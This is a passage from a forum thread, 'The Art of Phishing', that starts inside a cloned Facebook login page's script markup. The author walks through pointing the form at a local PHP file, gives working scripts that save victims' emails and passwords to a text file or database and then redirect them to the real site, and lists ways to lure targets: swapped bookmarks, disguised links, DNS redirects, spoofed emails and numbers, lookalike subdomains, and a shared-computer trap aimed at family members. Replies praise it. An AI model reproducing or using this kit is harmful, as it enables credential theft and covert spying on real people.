K","F5aqA","QV2wP","oxkbG","BqQay","fE\/se"],"module":true},"PhotoTagger":{"resources":["JtyCr","M2Jox","r+ckK","YICz5","F5aqA","QV2wP","oxkbG","BqQay","fE\/se","BANJS"],"module":true},"Live":{"resources":["JtyCr","cAkXN"],"module":true},"PhotoTagApproval":{"resources":["JtyCr","oxkbG","M2Jox"],"module":true},"PhotoTags":{"resources":["JtyCr","oxkbG","r+ckK","M2Jox"],"module":true},"TagTokenizer":{"resources":["JtyCr","fE\/se","F5aqA","ge0OI","VhRBk","M2Jox","r+ckK","fmS14"],"module":true},"css:fb-photos-snowlift-fullscreen-css":{"resources":["VDymv"]},"SnowliftPicCropper":{"resources":["JtyCr","YICz5","r+ckK","F5aqA","QV2wP","M2Jox","oxkbG","rqGCm","QMjhY","3hBYd","wxq+C"],"module":true},"PhotosButtonTooltips":{"resources":["JtyCr","r+ckK","YICz5","F5aqA","Rs18G"],"module":true},"VideoRotate":{"resources":["JtyCr","YICz5","r+ckK","F5aqA","QV2wP","6AU0l"],"module":true},"AsyncResponse":{"resources":["JtyCr"],"module":true},"PhotoPermalinkCropper":{"resources":["JtyCr","YICz5","r+ckK","F5aqA","QV2wP","M2Jox","oxkbG","rqGCm","7O5+\/","BqQay","fE\/se","BANJS","QMjhY","3hBYd"],"module":true},"PhotoInlineEditor":{"resources":["JtyCr","7O5+\/","YICz5","r+ckK","oxkbG","BqQay","M2Jox","F5aqA","QV2wP","fE\/se","BANJS","VhRBk","ge0OI","fmS14","AtxWD"],"module":true},"Form":{"resources":["JtyCr","r+ckK"],"module":true},"SpotlightShareViewer":{"resources":["JtyCr","BqQay","zyFOp"],"module":true},"Toggler":{"resources":["JtyCr","r+ckK","YICz5","F5aqA"],"module":true},"Tooltip":{"resources":["JtyCr","r+ckK","YICz5","F5aqA"],"module":true},"DOM":{"resources":["JtyCr"],"module":true},"Input":{"resources":["JtyCr","r+ckK"],"module":true},"trackReferrer":{"resources":[],"module":true},"DimensionTracking":{"resources":["JtyCr","BqQay"],"module":true},"HighContrastMode":{"resources":["JtyCr","BqQay"],"module":true},"DetectBrokenProxyCache":{"resources":["JtyCr","BqQay"],"module":true}});}});</script>
<script>requireLazy(["InitialJSLoader"], function(InitialJSLoader) {InitialJSLoader.loadOnDOMContentReady(["JtyCr","Nm4nS","fmS14","AhP9C","FlMQw","4vv8\/"]);});</script>
<script>
requireLazy(["Bootloader"], function(Bootloader) {Bootloader.configurePage(["r+ckK","bKKW+","F5aqA","nHPXb"]);});

(require("ServerJSDefine")).handleDefines([["TimeSpentConfig",[],{"0_delay":0,"0_timeout":8,"delay":200000,"timeout":64},142],["ImmediateActiveSecondsConfig",[],{"sampling_rate":0},423]]);require("InitialJSLoader").handleServerJS({"elements":[["m_0_1","login_form",2],["m_0_0","u_0_0",2],["m_0_2","loginbutton",2],["m_0_3","login_form",2]],"require":[["TimezoneAutoset","setInputValue",["m_0_0"],[{"__m":"m_0_0"},1414406746]],["LoginFormController","init",["m_0_1","m_0_2"],[{"__m":"m_0_1"},{"__m":"m_0_2"}]],["PostLoadJS","loadAndCall",[],["QuickSandSolver","solveAndUpdateForm",[1,"?|7??.U\u001d??\u04bcQ&\u04ebe????\u045bs???\u0005?NRr",10,42,100,"login_form","AZkDa7MgK5ihifkrxTRClF1Q_4Ow6EHPPzyOxgfYMA551B4OPIeKu0Ha9PyP3-26cOX5_NSe49abP6fK0HjcMuhBh_UO0eRZZyEyeZv4bXTl-iKF4_OjHP_5y3ebitc0krlDSVme5AjxeFQLvHZt06uVLZPhR3TeaRhNxHYb69R-_iptM9Gpc1Hhvbj4PDdgBkmZH86Nqw6rBufrgX0mLB253H-fofVZTzQ56twXFP9K2g"]]],["PixelRatio","startDetecting",[],[1]],["Intl","setPhonologicalRules",[],[{"meta":{"\/_B\/":"([.,!?\\s]|^)","\/_E\/":"([.,!?\\s]|$)"},"patterns":{"\/\u0001(.*)('|&#039;)s\u0001(?:'|&#039;)s(.*)\/":"\u0001$1$2s\u0001$3","\/_\u0001([^\u0001]*)\u0001\/e":"mb_strtolower(\"\u0001$1\u0001\")","\/\\^\\x01([^\\x01])(?=[^\\x01]*\\x01)\/e":"mb_strtoupper(\"\u0001$1\")","\/_\u0001([^\u0001]*)\u0001\/":"javascript"}}]],["PostLoadJS","loadAndRequire",[],["DimensionTracking"]],["PostLoadJS","loadAndCall",[],["HighContrastMode","init",[{"isHCM":false,"spacerImage":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/y4\/r\/-PAXP-deijE.gif"}]]],["PostLoadJS","loadAndCall",[],["DetectBrokenProxyCache","run",[0,"c_user"]]],["Artillery"],["ScriptPath","set",[],["\/login.php","ad976420","97164693"]],["ClickRefLogger"],["userAction","setUATypeConfig",[],[{"ua:e":false}]],["ScriptPathState","setUserURISampleRate",[],[0.0002]],["userAction","setCustomSampleConfig",[],[{"ua:n":{"test":{"ua_id":{"test":true}}},"ua:i":{"snowlift":{"action":{"open":true,"close":true}},"snowflake":{"action":{"open":true,"close":true}},"canvas":{"action":{"mouseover":true,"mouseout":true}}}}]],["UserActionHistory"],["ScriptPathLogger","startLogging",[],[]],["TimeSpentBitArrayLogger","init",[],[]],["TinyViewport"],["WebStorageMonster","schedule",[],[false]],["ModuleErrorLogger","init",[],[]]]});

</script>
<!-- BigPipe construction and first response -->
<script>var bigPipe = new (require("BigPipe"))({"lid":0,"forceFinish":true});</script>
<script>bigPipe.onPageletArrive({"id":"first_response","phase":0,"jsmods":{},"is_last":true,"css":["r+ckK","bKKW+","F5aqA","nHPXb"],"js":["JtyCr","Nm4nS","fmS14","AhP9C","FlMQw","4vv8\/"]})</script><script>bigPipe.onPageletArrive({"id":"","phase":1,"jsmods":{},"is_last":true,"css":["r+ckK","bKKW+","F5aqA","nHPXb"],"js":["JtyCr","Nm4nS","fmS14","AhP9C","FlMQw","4vv8\/"],"the_end":true})</script>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         </body></html>

That's a lot of data to sift through, so I recommend you hit cntrl+f and search for the following: action=
The action should be similar to action="/login.php?login_attempt=1" This is telling the form where to send the data off to, so we are going to want to modify this value.
For now, go ahead and change it to the following action="/login_failed.php"

4. [Logging credentials]
- Now that we have a page that looks identical to our target site's login page, and modified the form to point to a local file, let's create that file and have it log the credentials.
Let me start by saying that there are many ways to log someones credentials, I may mention some and not go into details, but I advise you look into all the different options. Create a file named login_failed.php in the same directory as the fake login page, and use your choice of any of the following logging methods:

Text file approach - Saving the credentials to a local text file (Make sure you have permissions to write to the file)
Code: Select all
<?php
       // replace credentials.txt with the filename of your choice (and location)
       $log_file = fopen('credentials.txt', 'a+');

       // Make sure the $_POST variables are using the correct arguments
       $email = $_POST['email'];
       $pass  = $_POST['pass'];
       $content = $email . ':' . $pass . "\r\n";

       fwrite($log_file, $content);
       fclose($log_file);

       // Replace the site below with the target site
       header('Location: https://www.facebook.com/login.php?login_attempt=1');
     ?>


The database approach - Take the username and password and store it in a database on a server (The below code assumes you have already created a database)
Code: Select all
<?php
       $server   = 'localhost';
       $username = 'root';
       $password = 'pass';
       $db_name  = 'phishing';

       $con = new mysqli($server, $username, $password, $db_name);
       if($con->connect_error) {
         header('Location: https://www.facebook.com/login.php?login_attempt=1');
       }
       $sql = "INSERT INTO accounts (user, pass) VALUES ($_POST['email'], $_POST['pass'])";
       $con->query($sql);
       $con->close();
       header('Location: https://www.facebook.com/login.php?login_attempt=1')
     ?>


The email approach - Assuming you have everything installed and can send e-mails with PHP, you can send the information to your e-mail.

The text approach - Using some API's, it's possible to send a text message to your phone with the information.


5. [Redirecting]
- In the code above, you will notice this line of PHP code several times:
Code: Select all
header('Location: https://www.facebook.com/login.php?login_attempt=1');
This is used to redirect the user back to the actual site, so that things are not obvious, and they can try to login a second time with success.

D. [Social Engineering & Tactics]
1. [Homepage / Bookmarks]
- I know you know those people. Their online life invloves hoping directly onto facebook. They want to get there as fast as possible. They usually have facebook set up as their homepage, or have it bookmarked. Go ahead and change that homepage / bookmark to your fake login page. Most of the time people will just open the browser or click the link, not thinking anything of it. Repetition is a big fallacy of the human mind, and after someone becomes used to something and adapt towards it, they often overlook the small things, such as the URL. (Read about the seven sins of memory for additional brownie points)

2. [Sending a link]
- This one requires a bit more skill, as it's more noticeable than the others. The goal is to get the victim to click on the link you gave them without making them suspicious. In my opinion, this is usually easiest somewhere that you have access to html tags. You could write a tutorial for something about facebook, and have the first link appear to go to the login page, but it really doesn't, like so:
Code: Select all
<a href="http://infosploit.com/test/phish.php">https://www.facebook.com/</a>
A live example would look like this: https://www.facebook.com/

3. [URL Redirects]
- If you can use something like dnsmasq, you can redirect users to your website when they attempt to visit the target site. The downfall to this approach is that the user will not be able to actually connect to the target site, which will easily draw awareness and raise flags to the victim (You also would need to change the redirects in the scripts). I recommend only doing this to things like e-mails, and banks, as you want to be prepared login quickly, get what you need, and then disable the redirects as fast as possible.

4. [Wait Bait]
- So, if you have a 'house computer' or a computer that is being shared between family members (like your damned cheating wife) or friends, I recommend this approach.
Load up your websites fake page, go to the URL, and type in the actual pages URL, so for example, I have fake facebook login located at: infosploit.com/test/phish.php, I would navigate there, and then replace the URL with https://www.facebook.com/ I would simply walk away from the computer, and wait for them to login, at that point they get redirected, thinking they entered the wrong credentials, unaware of the attack. Now, a word of advice with this approach is to have SSL enabled on your site (as you can tell I don't have it enabled), so the green lock some people are always looking for, is not there.

5. [Spoofing E-mail]
- If you can spoof an e-mail to your victim from an address that looks legitament on the target websites behalf, it's possible you can trick them into going to the link and loging in (for some specific purpose like checking messages). Here you need to just be creative and think of a reasonable message to make the user login. You do not want to post things like "We noticed recent activity in your security questions, login <insert link here> to view the changes." The reason I recommend against this, is because it's going to draw awarness, and they may change their password after logging in to the site.

6. [Spoofing Numbers]
- This consists of the same things mentioned in D.5, except you will be using a spoofed number.

7. [Portability]
- This will involve sending the link to people on mobile devices. If you have a server set up, you can get subdomains. I noticed on portable devices, especially phones, if the user is viewing the URL, it's sort of cut off and short. I recommend you take advantage of this by getting a subdomain relevant to the target site. So, if I wanted to target facebook and I own the site infosploit.com, I could get a subdomain like so: facebook.infosploit.com or similar. A lot of the times, the URL is cut off, so it might only show up on their bar as "https://facebook.info" or similar. This will aid in making the URL seem more viable to portable device users.

To give it a dummy whirl, open up http://infosploit.com/test/phish.php and then change the url to https://www.facebook.com/
Seems pretty legit if you just walked into a room with that computer on (minus the SSL)
Feel free to post some dummy information and then check back at: http://infosploit.com/test/.credentials.txt for the information
Last edited by -Ninjex- on Mon Oct 27, 2014 2:46 pm, edited 4 times in total.
image
For those that know
K: 0x2CD8D4F9
User avatar
-Ninjex-
Moderator
Moderator
 
Posts: 1691
Joined: Sun Sep 02, 2012 8:02 pm
Blog: View Blog (0)


Re: The Art of Phishing

Post by Freedom Jack on Mon Oct 27, 2014 9:35 am
([msg=84608]see Re: The Art of Phishing[/msg])

niceee
User avatar
Freedom Jack
New User
New User
 
Posts: 8
Joined: Wed Jan 12, 2011 10:05 pm
Blog: View Blog (0)


Re: The Art of Phishing

Post by tremor77 on Mon Oct 27, 2014 9:24 pm
([msg=84629]see Re: The Art of Phishing[/msg])

Thorough post and well laid out, I commend thee for all that typing.
User avatar
tremor77
Addict
Addict
 
Posts: 1098
Joined: Wed Mar 31, 2010 12:00 pm
Location: New York
Blog: View Blog (0)


Re: The Art of Phishing

Post by cyberdrain on Tue Oct 28, 2014 2:51 pm
([msg=84641]see Re: The Art of Phishing[/msg])

Nice read Ninjex, next up: Social Engineering Toolkit (or so I hope).
Free your mind / Think clearly
User avatar
cyberdrain
Expert
Expert
 
Posts: 2160
Joined: Sun Nov 27, 2011 1:58 pm
Blog: View Blog (0)


Re: The Art of Phishing

Post by centip3de on Tue Oct 28, 2014 3:02 pm
([msg=84642]see Re: The Art of Phishing[/msg])

+1 for Ninjex.
Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning. -Rick Cook
User avatar
centip3de
Addict
Addict
 
Posts: 1479
Joined: Fri Aug 20, 2010 5:46 pm
Blog: View Blog (0)


Re: The Art of Phishing

Post by Mr-Mouse on Tue Oct 28, 2014 10:16 pm
([msg=84651]see Re: The Art of Phishing[/msg])

Remind me to never click on a link you send me :D ahaha gj :)
Ah, when to the heart of man
Was it ever less than a treason
To go with the drift of things,
To yield with a grace to reason,
And bow and accept the end
Of a love or a season?

-Robert Frost
User avatar
Mr-Mouse
Experienced User
Experienced User
 
Posts: 53
Joined: Tue Oct 21, 2014 8:20 pm
Blog: View Blog (0)


Re: The Art of Phishing

Post by -Ninjex- on Thu Oct 30, 2014 8:16 am
([msg=84678]see Re: The Art of Phishing[/msg])

Thanks guys for reading. I suppose I could had went more in depth and discussed more on Social Engineering and even talked about spear phishing, but this was already quite lengthy.

So, the live demonstration isn't going to be available anymore. I've had multiple complaints from Google, regarding the status of my site. I received this message today:

Code: Select all
We have recently discovered that some pages on your site look like a possible phishing attack, in which users are encouraged to give up sensitive information such as login credentials or banking information. We have removed the suspicious URLs from Google.com search results and have begun showing a warning page to users who visit these URLs in certain browsers that receive anti-phishing data from Google.
image
For those that know
K: 0x2CD8D4F9
User avatar
-Ninjex-
Moderator
Moderator
 
Posts: 1691
Joined: Sun Sep 02, 2012 8:02 pm
Blog: View Blog (0)


Re: The Art of Phishing

Post by -Unicod3- on Thu Nov 06, 2014 6:50 am
([msg=84832]see Re: The Art of Phishing[/msg])

Very nice post! Too bad about Google being onto you :P
Little by little, one travels far” ― J.R.R. Tolkien
User avatar
-Unicod3-
Experienced User
Experienced User
 
Posts: 60
Joined: Sun Oct 13, 2013 10:47 am
Blog: View Blog (0)


Re: The Art of Phishing

Post by parakkafaith on Thu Nov 06, 2014 8:17 am
([msg=84837]see Re: The Art of Phishing[/msg])

That wait bait is my favourite. The thought of leaving a page open after changing the URL never crossed my mind.

I'd like to see more Ninjex SE wizardry.
"Any technology distinguishable from magic is insufficiently advanced."
- Probably not Arthur C. Clarke
User avatar
parakkafaith
Poster
Poster
 
Posts: 176
Joined: Fri Jan 07, 2011 10:59 pm
Blog: View Blog (0)



Return to Social Engineering

Who is online

Users browsing this forum: No registered users and 0 guests